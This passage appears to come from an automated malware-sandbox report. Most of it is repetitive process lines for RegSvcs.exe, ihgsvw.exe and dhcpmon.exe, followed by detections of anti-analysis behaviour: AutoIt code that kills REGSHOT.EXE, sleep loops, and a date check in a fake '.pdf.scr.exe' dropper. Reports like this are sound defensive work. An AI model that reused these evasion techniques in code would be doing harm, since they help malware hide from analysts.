Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM autoit script
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESS
Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEKW
Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 117 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 88 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 114 > 30
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Evasive API call chain: GetLocalTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
